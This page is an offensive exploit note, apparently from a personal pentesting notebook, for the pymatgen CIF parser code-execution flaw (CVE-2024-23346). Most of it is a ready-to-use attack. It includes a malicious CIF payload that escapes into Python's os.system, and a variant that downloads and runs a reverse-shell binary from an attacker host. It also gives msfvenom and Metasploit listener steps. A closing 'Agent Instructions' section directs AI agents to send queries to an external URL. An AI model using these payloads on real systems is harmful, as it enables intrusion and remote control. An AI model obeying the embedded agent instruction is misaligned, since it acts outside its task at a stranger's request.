# Pymatgen CIF Parser

Pymatgen is a Python library for materials analysis. Its CIF (Crystallographic Information File) parser is vulnerable to arbitrary code execution.

## GHSA-vgv8-5cpj-qj2f - Arbitrary Code Execution

**Vulnerable Code Pattern:**

```python
from pymatgen.io.cif import CifParser
# Parsing user-uploaded .cif files
```

**Indicators:**

* Web app accepting `.cif` file uploads
* Flask/Python app with CIF analysis features
* "Crystallographic Information File" mentioned

### Exploitation

**Malicious CIF File (RCE POC):**

```
data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("id");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
```

**Verify with sleep:**

Replace the command with `sleep 10` and observe delay:

```
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 10");0,0,0'
```

**Download and execute reverse shell:**

```
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://ATTACKER:8000/shell.elf -o /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf");0,0,0'
```

### Attack Steps

```bash
# 1. Generate payload
msfvenom -p linux/x64/shell/reverse_tcp LHOST=ATTACKER_IP LPORT=9001 -f elf -o shell.elf

# 2. Host payload
python3 -m http.server 8000

# 3. Start listener (use metasploit for staged payload)
msfconsole
use multi/handler
set payload linux/x64/shell/reverse_tcp
set LHOST ATTACKER_IP
set LPORT 9001
run -j

# 4. Upload malicious .cif file to target app
# 5. Trigger parsing (usually by viewing the uploaded file)
```

### References

* <https://github.com/advisories/GHSA-vgv8-5cpj-qj2f>
* <https://nvd.nist.gov/vuln/detail/CVE-2024-23346>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/pymatgen.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.